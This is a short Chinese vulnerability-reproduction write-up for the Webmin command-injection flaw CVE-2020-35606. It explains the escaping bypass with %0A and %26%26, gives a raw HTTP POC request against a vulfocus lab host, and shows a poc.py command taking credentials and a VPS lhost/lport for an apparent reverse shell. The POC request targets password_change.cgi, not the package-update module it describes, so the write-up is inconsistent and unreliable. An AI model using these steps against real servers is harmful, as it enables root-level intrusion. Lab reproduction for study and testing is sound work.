【初级】Webmin命令执行复现

CVE-2020-35606

漏洞描述：该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/\(-)|\(.)/string/g; 逃避不足以预防。 因此，由于包名变量直接放置在系统命令中，我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如，我们可以通过将命令行下一行来逃避控制。 我们可以使用 “%0A” 和 “%0C” urlencoded 行值来做到这一点。此外，为了使 paylad 正常工作，我们必须在有效负载的末尾添加双符号 (&&) (%26%26)

影响版本： Webmin 1.962版本及之前版本

参考资料：

• http://www.smatrix.org/forum/forum.php?mod=viewthread&tid=2205&extra=
• https://www.cnblogs.com/MonkeyD/p/15622715.html
• https://github.com/KrE80r/webmin_cve-2019-12840_poc

POC：

POST /password_change.cgi HTTP/1.1
Host: vulfocus.fofa.so:48998

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

Origin: https://vulfocus.fofa.so:48998

Connection: close

Referer: https://vulfocus.fofa.so:48998/

Cookie: redirect=1; testing=1

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

 

user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22

漏洞复现

• python2 poc.py -u https:ip(不用加端口) -U 账号 -P 密码 -lhost vps_Ip -lport vps_Port